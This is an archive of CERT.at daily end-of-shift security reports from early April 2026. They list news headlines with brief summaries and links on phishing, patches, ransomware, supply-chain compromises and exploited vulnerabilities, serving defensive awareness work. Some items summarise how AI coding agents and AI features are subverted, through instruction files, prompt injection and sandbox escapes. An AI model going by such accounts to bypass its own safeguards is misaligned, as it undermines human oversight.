Raiffeisen-Phishing: Datenklau statt Treuegeschenk ∗∗∗ --------------------------------------------- Noch schnell Raiffeisen-Treuepunkte einlösen bevor sie verfallen? Bloß nicht! Hinter einer aktuell kursierenden SMS-Nachricht versteckt sich nichts anderes als ein altbekannter Phishing-Versuch in neuem Gewand. --------------------------------------------- https://www.watchlist-internet.at/news/raiffeisen-phishing-treuegeschenke/ ===================== = Vulnerabilities = ===================== ∗∗∗ GitLab Patch Release: 18.10.3, 18.9.5, 18.8.9 ∗∗∗ --------------------------------------------- Today, we are releasing versions 18.10.3, 18.9.5, 18.8.9 for GitLab Community Edition (CE) and Enterprise Edition (EE). These versions contain important bug and security fixes, and we strongly recommend that all self-managed GitLab installations be upgraded to one of these versions immediately. --------------------------------------------- https://about.gitlab.com/releases/2026/04/08/patch-release-gitlab-18-10-3-r… ∗∗∗ Synology-SA-26:05 Synology SSL VPN Client ∗∗∗ --------------------------------------------- Synology has released a security update for the Synology SSL VPN Client utility to address vulnerabilities: CVE-2021-47960 allows remote attackers to access sensitive files from the SSL VPN Client installation directory via a local HTTP service when a user interacts with a crafted web page. CVE-2021-47961 allows remote attackers to obtain or manipulate the PIN code in SSL VPN Client, potentially leading to unauthorized VPN configuration and traffic interception when a user interacts with a crafted web page. --------------------------------------------- https://www.synology.com/en-global/support/security/Synology_SA_26_05 ∗∗∗ Wasmtimes April 9, 2026 Security Advisories ∗∗∗ --------------------------------------------- https://bytecodealliance.org/articles/wasmtime-security-advisories ∗∗∗ LWN: Security updates for Friday ∗∗∗ --------------------------------------------- https://lwn.net/Articles/1067200/ ∗∗∗ Tenable: [R1] Stand-alone Security Patch Available for Tenable Security Center Versions 6.5.1, 6.6.0, 6.7.2 and 6.8.0: SC202604.1 ∗∗∗ --------------------------------------------- https://www.tenable.com/security/tns-2026-10 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/mailman3/postorius/lists/daily.lists.cert.at/

1 0

Tageszusammenfassung - 09.04.2026
by Daily end-of-shift report 09 Apr '26

09 Apr '26

===================== = End-of-Day report = ===================== Timeframe: Mittwoch 08-04-2026 18:00 − Donnerstag 09-04-2026 18:00 Handler: Michael Schlagenhaufer Co-Handler: n/a ===================== = News = ===================== ∗∗∗ PDF öffnen reicht: Ungepatchte Lücke in Adobe Reader seit Monaten ausgenutzt ∗∗∗ --------------------------------------------- Angreifer nutzen seit Ende 2025 eine Zero-Day-Lücke in Adobe Reader aus, um Daten abzugreifen und Schadcode einzuschleusen. [..] Der Exploit funktioniert laut Li auch mit der neuesten Adobe-Reader-Version. Adobe soll bereits über die Zero-Day-Lücke informiert worden sein. Bis ein Fix zur Verfügung steht, dürften aber noch ein paar Tage vergehen. --------------------------------------------- https://www.golem.de/news/pdf-oeffnen-reicht-ungepatchte-luecke-in-adobe-re… ∗∗∗ 13-year-old bug in ActiveMQ lets hackers remotely execute commands ∗∗∗ --------------------------------------------- Security researchers discovered a remote code execution (RCE) vulnerability in Apache ActiveMQ Classic that has gone undetected for 13 years and could be exploited to execute arbitrary commands. The flaw was uncovered using the Claude AI assistant, which identified an exploit path by analyzing how independently developed components interact. [..] The researcher reported the vulnerability to Apache maintainers on March 22, and the developer addressed it on March 30 in ActiveMQ Classic versions 6.2.3 and 5.19.4. --------------------------------------------- https://www.bleepingcomputer.com/news/security/13-year-old-bug-in-activemq-… ∗∗∗ Hackers use pixel-large SVG trick to hide credit card stealer ∗∗∗ --------------------------------------------- A massive campaign impacting nearly 100 online stores using the Magento e-commerce platform hides credit card-stealing code in a pixel-sized Scalable Vector Graphics (SVG) image. When clicking the checkout button, the victim is shown a convincing overlay that can validate card details and billing data. --------------------------------------------- https://www.bleepingcomputer.com/news/security/hackers-use-pixel-large-svg-… ∗∗∗ Nicht nur Veracrypt: Auch VPN-Entwickler von Microsoft ausgesperrt ∗∗∗ --------------------------------------------- Offenkundig hat nicht nur der Veracrypt-Entwickler Probleme mit dem Zugriff auf sein Microsoft-Konto. Auch die Entwickler der VPN-Software Wireguard sowie des VPN-Dienstes Windscribe bestätigen auf X, aus ihren Accounts ausgesperrt worden zu sein. [..] Microsoft reagiert. --------------------------------------------- https://www.golem.de/news/nicht-nur-veracrypt-auch-vpn-entwickler-von-micro… ∗∗∗ Fileless In-Memory Loader Drops ScreenConnect ∗∗∗ --------------------------------------------- In February 2026, Zscaler ThreatLabz discovered an attack chain where attackers used a fake Adobe Acrobat Reader download to lure victims into installing ConnectWise’s ScreenConnect. While ScreenConnect is a legitimate remote access tool, it can be leveraged for malicious purposes. In this blog post, ThreatLabz examines the various stages of this attack, from the download lure to the in-memory loader used to reduce on-disk artifacts that could be used for detection and analysis. --------------------------------------------- https://www.zscaler.com/blogs/security-research/fileless-memory-loader-drop… ∗∗∗ Claude Code Can Be Manipulated via CLAUDE.md to Run SQL Injection Attacks ∗∗∗ --------------------------------------------- LayerX researchers have discovered how to bypass Claude Code’s safety rules using the CLAUDE.md file. This exploit allows anyone to automate SQL injection attacks and steal user credentials without writing any code. --------------------------------------------- https://hackread.com/claude-code-claude-md-sql-injection-attacks/ ∗∗∗ Kommentar: KI-FOMO frisst Sicherheit ∗∗∗ --------------------------------------------- KI-Systeme auf Basis großer Sprachmodelle bringen neue Arten von Sicherheitslücken und Risiken mit sich. [..] Doch so wichtig die Diskussion von neuen, vergleichsweise wenig erforschten Sicherheitsproblemen ist: Sie überdeckt leicht, dass KI-Systeme immer auch klassische Software enthalten – in der naturgemäß klassische Sicherheitslücken stecken. --------------------------------------------- https://heise.de/-11218162 ∗∗∗ CISA-Notbetrieb: Gehaltszahlungen für vergangene sechs Wochen versprochen ∗∗∗ --------------------------------------------- Noch immer ist das US-Heimatschutzministerium im Shutdown-Modus. Nun sollen die Mitarbeiter trotzdem Gehalt für sechs Wochen erhalten. --------------------------------------------- https://heise.de/-11250415 ∗∗∗ Unpatchable Vulnerabilities of Kubernetes: CVE-2020-8562 ∗∗∗ --------------------------------------------- This is an interesting and somewhat subtle network vulnerability, which again shows how difficult it can be to secure the complex networking services provided by Kubernetes. Like our other unpatchable Kubernetes vulnerabilities, it won't be a significant issue for many Kubernetes clusters, but if you're running a managed Kubernetes service, it's definitely one to consider, as attackers might use it to probe your control plane network. In our next post, we'll be looking at the last of the four unpatchable CVEs in Kubernetes, CVE-2021-25740. --------------------------------------------- https://securitylabs.datadoghq.com/articles/unpatchable-kubernetes-vulnerab… ∗∗∗ TeamPCP Supply Chain Campaign: Update 007 - Cisco Source Code Stolen via Trivy-Linked Breach, Google GTIG Tracks TeamPCP as UNC6780, and CISA KEV Deadline Arrives with No Standalone Advisory, (Wed, Apr 8th) ∗∗∗ --------------------------------------------- This is the seventh update to the TeamPCP supply chain campaign threat intelligence report, "When the Security Scanner Became the Weapon" (v3.0, March 25, 2026). Update 006 covered developments through April 3, including the CERT-EU European Commission breach disclosure, ShinyHunters' confirmation of credential sharing, Sportradar breach details, and Mandiant's quantification of 1,000+ compromised SaaS environments. This update consolidates five days of intelligence from April 3 through April 8, 2026. --------------------------------------------- https://isc.sans.edu/diary/rss/32880 ∗∗∗ Number Usage in Passwords: Take Two, (Thu, Apr 9th) ∗∗∗ --------------------------------------------- In a previous diary [1], we looked to see how numbers were used within passwords submitted to honeypots. One of the items of interest was how dates, and more specifically years, were represented within the data and how that changed over time. It is often seen that years and seasons are used in passwords, especially when password change requirements include frequenty password changes. --------------------------------------------- https://isc.sans.edu/diary/rss/32866 ∗∗∗ Cracks in the Bedrock: Agent God Mode ∗∗∗ --------------------------------------------- Our first article about the boundaries and resilience of Amazon Bedrock AgentCore focused on the Code Interpreter sandbox, and how it can be bypassed using DNS tunneling. In this second part, we delve into the identity and permissions model of AgentCore and the AgentCore starter toolkit. --------------------------------------------- https://unit42.paloaltonetworks.com/exploit-of-aws-agentcore-iam-god-mode/ ∗∗∗ What we learned about TEE security from auditing WhatsApps Private Inference ∗∗∗ --------------------------------------------- WhatsApp’s new “Private Inference” feature represents one of the most ambitious attempts to combine end-to-end encryption with AI-powered capabilities, such as message summarization. To make this possible, Meta built a system that processes encrypted user messages inside trusted execution environments (TEEs), secure hardware enclaves designed so that not even Meta can access the plaintext. Our now-public audit, conducted before launch, identified several vulnerabilities that compromised WhatsApp’s privacy model, all of which Meta has patched. --------------------------------------------- https://blog.trailofbits.com/2026/04/07/what-we-learned-about-tee-security-… ===================== = Vulnerabilities = ===================== ∗∗∗ Drupal: Orejime - Moderately critical - Cross-site scripting - SA-CONTRIB-2026-032 ∗∗∗ --------------------------------------------- https://www.drupal.org/sa-contrib-2026-032 ∗∗∗ LWN: Security updates for Thursday ∗∗∗ --------------------------------------------- https://lwn.net/Articles/1066972/ ∗∗∗ Google Chrome 147: Update stopft 60 Sicherheitslücken, davon zwei kritische ∗∗∗ --------------------------------------------- https://heise.de/-11249800 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/mailman3/postorius/lists/daily.lists.cert.at/

1 0

Tageszusammenfassung - 08.04.2026
by Daily end-of-shift report 08 Apr '26

08 Apr '26

===================== = End-of-Day report = ===================== Timeframe: Dienstag 07-04-2026 18:00 − Mittwoch 08-04-2026 18:00 Handler: Michael Schlagenhaufer Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Iran-Linked Hackers Are Sabotaging US Energy and Water Infrastructure ∗∗∗ --------------------------------------------- As Trump threatens Iranian infrastructure, the US government warns that Iran has carried out its own digital attacks against US critical infrastructure. --------------------------------------------- https://www.wired.com/story/iran-linked-hackers-are-sabotaging-us-energy-an… ∗∗∗ Anthropic Teams Up With Its Rivals to Keep AI From Hacking Everything ∗∗∗ --------------------------------------------- The AI labs Project Glasswing will bring together Apple, Google, and more than 45 other organizations. Theyll use the new Claude Mythos Preview model to test advancing AI cybersecurity capabilities. --------------------------------------------- https://www.wired.com/story/anthropic-mythos-preview-project-glasswing/ ∗∗∗ Wichtiges Bug-Bounty-Programm pausiert: KI-Reports überlasten Open-Source-Projekte ∗∗∗ --------------------------------------------- Internet Bug Bounty zahlt vorerst keine Prämien mehr. Das betrifft unter anderem Node.js. Der Grund: Mit KI wird viel gemeldet, aber wenig gefixt. --------------------------------------------- https://www.golem.de/news/wichtiges-bug-bounty-programm-pausiert-ki-reports… ∗∗∗ Microsoft Releases Open Source Toolkit for AI Agent Runtime Security ∗∗∗ --------------------------------------------- Microsoft has published its Agent Governance Toolkit, an open source project that brings runtime policy enforcement to autonomous AI agents. The release lands as the industry grapples with a widening gap between how fast AI agents are being deployed and how little infrastructure exists to govern what they do once theyre running. The toolkit is available under the MIT license at the Microsoft GitHub organization and supports Python, TypeScript, Rust, Go, and .NET. --------------------------------------------- https://socket.dev/blog/microsoft-open-source-toolkit-for-ai-agent-runtime-… ∗∗∗ Spooler Alert: Remote Unauthd RCE-to-root Chain in CUPS ∗∗∗ --------------------------------------------- TLDR: my self-orchestrating team of vulnerability hunting agents discovered two issues in CUPS, CVE-2026-34980 and CVE-2026-34990, chainable into unauthenticated remote attacker -> unprivileged RCE -> root file (over)write. See below for the prerequisites, details, and mitigation options. --------------------------------------------- https://heyitsas.im/posts/cups/ ∗∗∗ Keine neuen Windows-Versionen: Microsoft sperrt Veracrypt-Entwickler aus ∗∗∗ --------------------------------------------- Der Veracrypt-Entwickler kann die Windows-Variante seiner Verschlüsselungssoftware nicht mehr aktualisieren. [..] Idrassi versuchte nach eigenen Angaben mehrfach, Microsoft über verschiedene Kanäle zu kontaktieren. Dabei sei er aber nur an automatisierte Antworten und Bots geraten. --------------------------------------------- https://www.golem.de/news/keine-neuen-windows-versionen-microsoft-sperrt-ve… ∗∗∗ A Little Bit Pivoting: What Web Shells are Attackers Looking for?, (Tue, Apr 7th) ∗∗∗ --------------------------------------------- Webshells remain a popular method for attackers to maintain persistence on a compromised web server. Many "arbitrary file write" and "remote code execution" vulnerabilities are used to drop small files on systems for later execution of additional payloads. The names of these files keep changing and are often chosen to "fit in" with other files. --------------------------------------------- https://isc.sans.edu/diary/rss/32874 ∗∗∗ More Honeypot Fingerprinting Scans, (Wed, Apr 8th) ∗∗∗ --------------------------------------------- One question that often comes up when I talk about honeypots: Are attackers able to figure out if they are connected to a honeypot? The answer is pretty simple: Yes! --------------------------------------------- https://isc.sans.edu/diary/rss/32878 ∗∗∗ Cracks in the Bedrock: Escaping the AWS AgentCore Sandbox ∗∗∗ --------------------------------------------- Unit 42 uncovers critical vulnerabilities in Amazon Bedrock AgentCores sandbox, demonstrating DNS tunneling and credential exposure. [..] We also identified a critical security regression where the AgentCore Runtime utilized a microVM Metadata Service (MMDS) that lacks session token enforcement. Prior to our disclosure and AWS's fixes, this configuration could have allowed an attacker to exploit standard web vulnerabilities, such as server-side request forgery (SSRF), to directly extract sensitive credentials, putting the entire environment at risk. --------------------------------------------- https://unit42.paloaltonetworks.com/bypass-of-aws-sandbox-network-isolation… ∗∗∗ New ClickFix Attack Uses Node.js Malware via Tor to Steal Crypto ∗∗∗ --------------------------------------------- Netskope Threat Labs report a new ClickFix attack using fake CAPTCHAs to deploy Tor-backed NodeJS malware and drain crypto wallets on Windows. --------------------------------------------- https://hackread.com/clickfix-attack-node-js-malware-tor-steal-crypto/ ∗∗∗ Jetzt patchen! Attacken auf Low-Coding-Tool Flowise beobachtet ∗∗∗ --------------------------------------------- Unbekannte Angreifer nutzen derzeit eine kritische Sicherheitslücke mit Höchstwertung in Flowise aus. [..] Um Systeme vor diesen Attacken zu schützen, müssen Admins sicherstellen, dass mindestens Flowise 3.0.6 installiert ist. Aktuell ist die Ausgabe 3.1.1. --------------------------------------------- https://heise.de/-11248346 ∗∗∗ When the compiler lies: breaking memory safety in safe Go ∗∗∗ --------------------------------------------- Early in March, I reported two compiler bugs affecting Go releases up to 1.26.1 which broke the Go memory safety guarantees using only safe Go code. [..] I’m not including the full end-to-end exploits, to allow the fixed releases to become more widely available. I’ll briefly describe the issues and show the problematic code patterns though. --------------------------------------------- https://ciolek.dev/posts/when-the-compiler-lies ===================== = Vulnerabilities = ===================== ∗∗∗ Palo Alto Networks Security Advisories ∗∗∗ --------------------------------------------- Palo Alto has released 6 new security advisories (1x high, 3x medium, 2x informational) --------------------------------------------- https://security.paloaltonetworks.com/ ∗∗∗ Juniper: 2026-04 Security Bulletin: vLWC: Default password is not required to be changed which allows unauthorized high-privileged access (CVE-2026-33784) ∗∗∗ --------------------------------------------- https://supportportal.juniper.net/s/article/2026-04-Security-Bulletin-vLWC-… ∗∗∗ Juniper: 2026-04 Security Bulletin: CTP OS: Configuring password requirements does not work which permits the use of weak passwords (CVE-2026-33771) ∗∗∗ --------------------------------------------- https://supportportal.juniper.net/s/article/2026-04-Security-Bulletin-CTP-O… ∗∗∗ Juniper: 2026-04 Security Bulletin: Apstra: SSH host key validation vulnerability for managed devices (CVE-2025-13914) ∗∗∗ --------------------------------------------- https://supportportal.juniper.net/s/article/2026-04-Security-Bulletin-Apstr… ∗∗∗ LWN: Security updates for Wednesday ∗∗∗ --------------------------------------------- https://lwn.net/Articles/1066809/ ∗∗∗ Mozilla: Security Vulnerabilities fixed in Thunderbird 140.9.1 ∗∗∗ --------------------------------------------- https://www.mozilla.org/en-US/security/advisories/mfsa2026-29/ ∗∗∗ Mozilla: Security Vulnerabilities fixed in Thunderbird 149.0.2 ∗∗∗ --------------------------------------------- https://www.mozilla.org/en-US/security/advisories/mfsa2026-28/ ∗∗∗ Nix security advisory: Privilege escalation via symlink following during FOD output registration ∗∗∗ --------------------------------------------- https://discourse.nixos.org/t/nix-security-advisory-privilege-escalation-vi… -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/mailman3/postorius/lists/daily.lists.cert.at/

1 0

Tageszusammenfassung - 07.04.2026
by Daily end-of-shift report 07 Apr '26

07 Apr '26

===================== = End-of-Day report = ===================== Timeframe: Freitag 03-04-2026 18:00 − Dienstag 07-04-2026 18:00 Handler: Felician Fuchs Co-Handler: Alexander Riepl ===================== = News = ===================== ∗∗∗ Hackers exploit React2Shell in automated credential theft campaign ∗∗∗ --------------------------------------------- Hackers are running a large-scale campaign to steal credentials in an automated way after exploiting React2Shell (CVE-2025-55182) in vulnerable Next.js apps. --------------------------------------------- https://www.bleepingcomputer.com/news/security/hackers-exploit-react2shell-… ∗∗∗ Drift $280M crypto theft linked to 6-month in-person operation ∗∗∗ --------------------------------------------- The Drift Protocol says that the $280+ million hack it suffered last week was the result of a long-term, carefully planned operation that included building "a functioning operational presence inside the Drift ecosystem." --------------------------------------------- https://www.bleepingcomputer.com/news/security/drift-280m-crypto-theft-link… ∗∗∗ How often are redirects used in phishing in 2026?, (Mon, Apr 6th) ∗∗∗ --------------------------------------------- In one of his recent diaries, Johannes discussed how open redirects are actively being sought out by threat actors, which made me wonder about how commonly these mechanisms are actually misused. Although open redirect is not generally considered a high-impact vulnerability on its own, it can have multiple negative implications. Johannes already covered one in connection with OAuth flows, but another important (mis)use case for them is phishing. --------------------------------------------- https://isc.sans.edu/diary/rss/32870 ∗∗∗ China-Linked Storm-1175 Exploits Zero-Days to Rapidly Deploy Medusa Ransomware ∗∗∗ --------------------------------------------- A China-based threat actor known for deploying Medusa ransomware has been linked to the weaponization of a combination of zero-day and N-day vulnerabilities to orchestrate "high-velocity" attacks and break into susceptible internet-facing systems. --------------------------------------------- https://thehackernews.com/2026/04/china-linked-storm-1175-exploits-zero.html ∗∗∗ Over 1,000 Exposed ComfyUI Instances Targeted in Cryptomining Botnet Campaign ∗∗∗ --------------------------------------------- An active campaign has been observed targeting internet-exposed instances running ComfyUI, a popular stable diffusion platform, to enlist them into a cryptocurrency mining and proxy botnet. --------------------------------------------- https://thehackernews.com/2026/04/over-1000-exposed-comfyui-instances.html ∗∗∗ The Hack That Exposed Syria’s Sweeping Security Failures ∗∗∗ --------------------------------------------- When Syrian government accounts were hijacked in March, the breach looked chaotic. But it revealed something more troubling: a state struggling with the most basic layer of cybersecurity. --------------------------------------------- https://www.wired.com/story/inside-the-hack-that-exposed-syrias-security-fa… ∗∗∗ Germany Doxes “UNKN,” Head of RU Ransomware Gangs REvil, GandCrab ∗∗∗ --------------------------------------------- An elusive hacker who went by the handle "UNKN" and ran the early Russian ransomware groups GandCrab and REvil now has a name and a face. Authorities in Germany say 31-year-old Russian Daniil Maksimovich Shchukin headed both cybercrime gangs and helped carry out at least 130 acts of computer sabotage and extortion against victims across the country between 2019 and 2021. --------------------------------------------- https://krebsonsecurity.com/2026/04/germany-doxes-unkn-head-of-ru-ransomwar… ∗∗∗ Das Zertifikat für die ID Austria läuft ab? Wenn Betrug und Realität verschmelzen ∗∗∗ --------------------------------------------- Tatsächlich verlieren in den nächsten Monaten rund 300.000 Zertifikate der ID Austria ihre Gültigkeit. Wer nicht rechtzeitig verlängert, muss ein neues beantragen. SMS-Nachrichten, die vor einem zeitnahen Ablaufen warnen, sind und bleiben aber weiterhin das, was sie immer schon waren: Betrugsversuche! Woran die Falle zu erkennen ist, erklärt dieser Artikel. --------------------------------------------- https://www.watchlist-internet.at/news/id-austria-laeuft-ab/ ∗∗∗ Understanding Current Threats to Kubernetes Environments ∗∗∗ --------------------------------------------- Unit 42 uncovers escalating Kubernetes attacks, detailing how threat actors exploit identities and critical vulnerabilities to compromise cloud environments. --------------------------------------------- https://unit42.paloaltonetworks.com/modern-kubernetes-threats/ ∗∗∗ Hackers threaten to leak data after cyberattack on German party Die Linke ∗∗∗ --------------------------------------------- Die Linke confirmed in late March that its IT infrastructure had been hit by what it described as a “serious cyberattack.” --------------------------------------------- https://therecord.media/hackers-threaten-to-leak-german-political-party-data ∗∗∗ Cyberattack on telecom giant Rostelecom disrupts internet services across Russia ∗∗∗ --------------------------------------------- A “large-scale” distributed denial-of-service (DDoS) attack targeted the network of Russian state-run telecom giant Rostelecom on Monday evening, temporarily disrupting online banking, government platforms and other digital services across dozens of cities. --------------------------------------------- https://therecord.media/rostelecom-cyberattack-disrupts-russian-internet-ac… ∗∗∗ UK exposes Russian military intelligence hijacking vulnerable routers for cyber attacks ∗∗∗ --------------------------------------------- New advisory warns cyber threat group APT28 have exploited vulnerable edge devices to support malicious operations. --------------------------------------------- https://www.ncsc.gov.uk/news/uk-exposes-russian-military-intelligence-hijac… ∗∗∗ GrafanaGhost Vulnerability Allows Silent Data Theft via AI Injection ∗∗∗ --------------------------------------------- GrafanaGhost is a critical vulnerability in Grafana’s AI components that uses indirect prompt injection and protocol-relative URL bypasses to exfiltrate data. --------------------------------------------- https://hackread.com/grafanaghost-vulnerability-data-theft-via-ai-injection/ ∗∗∗ A Cryptography Engineer’s Perspective on Quantum Computing Timelines ∗∗∗ --------------------------------------------- My position on the urgency of rolling out quantum-resistant cryptography has changed compared to just a few months ago. You might have heard this privately from me in the past weeks, but it’s time to signal and justify this change of mind publicly. --------------------------------------------- https://words.filippo.io/crqc-timeline/ ∗∗∗ Attackers Are Hunting High-Impact Node.js Maintainers in a Coordinated Social Engineering Campaign ∗∗∗ --------------------------------------------- Since we published our initial analysis of the axios compromise, a deep dive into its hidden blast radius, and a report on the maintainer confirming it was social engineering, maintainers across the Node.js ecosystem have come out of the woodwork to report that they were targeted by the same social engineering campaign. The accounts now span some of the most widely depended-upon packages in the npm registry and Node.js core itself, and together they confirm that axios was not a one-off target. --------------------------------------------- https://socket.dev/blog/attackers-hunting-high-impact-nodejs-maintainers ∗∗∗ Getting root on on TP-Link Smart Switches using CVE-2026-1668 ∗∗∗ --------------------------------------------- In the previous post, I described how we can exploit CVE-2026-1668 to gain arbitrary code execution. In this post, I go into the details of building a useful exploit payload. --------------------------------------------- https://blog.tangrs.id.au/2026/04/06/exploiting-cve-2026-1668-part-3/ ===================== = Vulnerabilities = ===================== ∗∗∗ Disgruntled researcher leaks “BlueHammer” Windows zero-day exploit ∗∗∗ --------------------------------------------- Exploit code has been released for an unpatched Windows privilege escalation flaw reported privately to Microsoft, allowing attackers to gain SYSTEM or elevated administrator permissions. --------------------------------------------- https://www.bleepingcomputer.com/news/security/disgruntled-researcher-leaks… ∗∗∗ Druckersystem: Cups-Lücken gefährden zahlreiche Linux-Systeme ∗∗∗ --------------------------------------------- Ein Forscher hat KI-Agenten auf das Druckersystem Cups angesetzt. Zwei entdeckte Sicherheitslücken verleihen Angreifern Root-Zugriff aus der Ferne. --------------------------------------------- https://www.golem.de/news/von-ki-agenten-entdeckt-print-server-luecken-gefa… ∗∗∗ Jetzt updaten! Kritische FortiClient-EMS-Lücke wird attackiert ∗∗∗ --------------------------------------------- Fortinet hat Hotfixes bereitgestellt und rät Admins dringend, sie zügig anzuwenden. Sie stopfen ein angegriffenes Codeschmuggel-Leck. --------------------------------------------- https://www.heise.de/news/FortiClient-EMS-Kritische-Codeschmuggel-Luecke-wi… ∗∗∗ 50,000 WordPress Sites affected by Arbitrary File Upload Vulnerability in Ninja Forms – File Upload WordPress Plugin ∗∗∗ --------------------------------------------- On January 8th, 2026, we received a submission for an Arbitrary File Upload vulnerability in Ninja Forms - File Upload, a WordPress plugin with an estimated 50,000 active installations. This vulnerability makes it possible for an unauthenticated attacker to upload arbitrary files to a vulnerable site and achieve remote code execution. --------------------------------------------- https://www.wordfence.com/blog/2026/04/50000-wordpress-sites-affected-by-ar… ∗∗∗ Angreifer können Weboberfläche von WatchGuard Firebox attackieren ∗∗∗ --------------------------------------------- WatchGuard-Firewalls der Firebox-Serie und die Produkte Dimension und WebBlockerServer sind verwundbar. Sicherheitspatches sind verfügbar. --------------------------------------------- https://heise.de/-11246291 ∗∗∗ LWN Security updates for Tuesday ∗∗∗ --------------------------------------------- https://lwn.net/Articles/1066665/ -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/mailman3/postorius/lists/daily.lists.cert.at/

1 0

Tageszusammenfassung - 03.04.2026
by Daily end-of-shift report 03 Apr '26

03 Apr '26

===================== = End-of-Day report = ===================== Timeframe: Donnerstag 02-04-2026 18:00 − Freitag 03-04-2026 18:00 Handler: Guenes Holler Co-Handler: Michael Schlagenhaufer ===================== = News = ===================== ∗∗∗ New Rowhammer attacks give complete control of machines running Nvidia GPUs ∗∗∗ --------------------------------------------- Over the past decade, dozens of newer Rowhammer attacks have evolved to, among other things [..] On Thursday, two research teams, working independently of each other, demonstrated attacks against two cards from Nvidia’s Ampere generation that take GPU rowhammering into new—and potentially much more consequential—territory: GDDR bitflips that give adversaries full control of CPU memory, resulting in full system compromise of the host machine. For the attack to work, IOMMU memory management must be disabled, as is the default in BIOS settings. --------------------------------------------- https://arstechnica.com/security/2026/04/new-rowhammer-attacks-give-complet… ∗∗∗ Picking Up Skull Vibrations? Could Be XR Headset Authentication ∗∗∗ --------------------------------------------- The next frontier for biometric authentication may be upon us, and it involves the vibrations of one's skull. Last week, a research team led by Rutgers University introduced a new biometric authentication software compatible with extended reality (XR) headsets — the umbrella term for virtual reality, augmented reality, and mixed reality hardware. --------------------------------------------- https://www.darkreading.com/remote-workforce/skull-vibrations-could-be-xr-h… ∗∗∗ Hackers Exploit CVE-2025-55182 to Breach 766 Next.js Hosts, Steal Credentials ∗∗∗ --------------------------------------------- A large-scale credential harvesting operation has been observed exploiting the React2Shell vulnerability as an initial infection vector to steal database credentials, SSH private keys, Amazon Web Services (AWS) secrets, shell command history, Stripe API keys, and GitHub tokens at scale. --------------------------------------------- https://thehackernews.com/2026/04/hackers-exploit-cve-2025-55182-to.html ∗∗∗ They thought they were downloading Claude Code source. They got a nasty dose of malware instead ∗∗∗ --------------------------------------------- Source code with a side of Vidar stealer and GhostSocks Tens of thousands of people eagerly downloaded the leaked Claude Code source code this week, and some of those downloads came with a side of credential-stealing malware. --------------------------------------------- https://go.theregister.com/feed/www.theregister.com/2026/04/02/trojanized_c… ∗∗∗ Neuer "Storm"-Infostealer klaut Zugangsdaten und wird im Darknet angeboten ∗∗∗ --------------------------------------------- Sicherheitsforscher von den Varonis Threat Labs sind Anfang 2026 auf einen neuen Infostealer „Storm" gestoßen. Der wird derzeit unter Cyberkriminellen gehandelt und kann remote Sitzungsdaten aus den derzeit beliebtesten Browsern (Google Chrome, Microsoft Edge und Mozilla Firefox) sammeln. --------------------------------------------- https://borncity.com/blog/2026/04/03/neuer-storm-infostealer-klaut-zugangsd… ∗∗∗ Weaponizing Trust Signals: Claude Code Lures and GitHub Release Payloads ∗∗∗ --------------------------------------------- A packaging error in Anthropic’s Claude Code npm release briefly exposed internal source code. This entry examines how threat actors rapidly weaponized the resulting attention, pivoting an existing AI-themed campaign to spread Vidar and GhostSocks. --------------------------------------------- https://www.trendmicro.com/en_us/research/26/d/weaponizing-trust-signals-cl… ∗∗∗ Axios Maintainer Confirms Social Engineering Attack Behind npm Compromise ∗∗∗ --------------------------------------------- On March 31, two malicious versions of Axios were briefly published to npm, introducing a dependency that installed a remote access trojan across macOS, Windows, and Linux.We covered the initial attack and its scope earlier, as well as a deeper technical analysis of its hidden blast radius and how dependency resolution expanded its impact exponentially. Now, the project’s lead maintainer has shared additional details about how the compromise occurred. --------------------------------------------- https://socket.dev/blog/axios-maintainer-confirms-social-engineering-behind… ===================== = Vulnerabilities = ===================== ∗∗∗ LWN: Security updates for Friday ∗∗∗ --------------------------------------------- https://lwn.net/Articles/1066236/ -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/mailman3/postorius/lists/daily.lists.cert.at/

1 0

Tageszusammenfassung - 02.04.2026
by Daily end-of-shift report 02 Apr '26

02 Apr '26

===================== = End-of-Day report = ===================== Timeframe: Mittwoch 01-04-2026 18:00 − Donnerstag 02-04-2026 18:00 Handler: Felician Fuchs Co-Handler: n/a ===================== = News = ===================== ∗∗∗ NoVoice Android malware on Google Play infected 2.3 million devices ∗∗∗ --------------------------------------------- A new Android malware named NoVoice was found on Google Play, hidden in more than 50 apps that were downloaded at least 2.3 million times. --------------------------------------------- https://www.bleepingcomputer.com/news/security/novoice-android-malware-on-g… ∗∗∗ New EvilTokens service fuels Microsoft device code phishing attacks ∗∗∗ --------------------------------------------- A new malicious kit called EvilTokens integrates device code phishing capabilities, allowing attackers to hijack Microsoft accounts and provide advanced features for business email compromise attacks. --------------------------------------------- https://www.bleepingcomputer.com/news/security/new-eviltokens-service-fuels… ∗∗∗ Hackers exploit TrueConf zero-day to push malicious software updates ∗∗∗ --------------------------------------------- Hackers have targeted TrueConf conference servers in attacks that exploit a zero-day vulnerability, allowing them to execute arbitrary files on all connected endpoints. --------------------------------------------- https://www.bleepingcomputer.com/news/security/hackers-exploit-trueconf-zer… ∗∗∗ Over 14,000 F5 BIG-IP APM instances still exposed to RCE attacks ∗∗∗ --------------------------------------------- Internet security watchdog Shadowserver has found over 14,000 BIG-IP APM instances exposed online amid ongoing attacks exploiting a critical-severity remote code execution (RCE) vulnerability. --------------------------------------------- https://www.bleepingcomputer.com/news/security/over-14-000-f5-big-ip-apm-in… ∗∗∗ Cyberangriff auf Hasbro: Hacker infiltrieren IT von großem Spielwarenkonzern ∗∗∗ --------------------------------------------- Ein Angreifer ist in die IT-Umgebung von Hasbro eingedrungen. Der Spielwarenhersteller rechnet mit einer Aufarbeitungszeit von mehreren Wochen. --------------------------------------------- https://www.golem.de/news/cyberangriff-auf-hasbro-hacker-infiltrieren-it-vo… ∗∗∗ Nur schwer löschbar: Android-Malware millionenfach über Google Play verteilt ∗∗∗ --------------------------------------------- Eine über den Google Play Store verbreitete Android-Malware nutzt alte Lücken aus, um tief ins System einzudringen. Anwender merken davon nichts. --------------------------------------------- https://www.golem.de/news/nur-schwer-loeschbar-android-malware-millionenfac… ∗∗∗ CERT-UA Impersonation Campaign Spread AGEWHEEZE Malware to 1 Million Emails ∗∗∗ --------------------------------------------- The Computer Emergency Response Team of Ukraine (CERT-UA) has disclosed details of a new phishing campaign in which the cybersecurity agency itself was impersonated to distribute a remote administration tool known as AGEWHEEZE. --------------------------------------------- 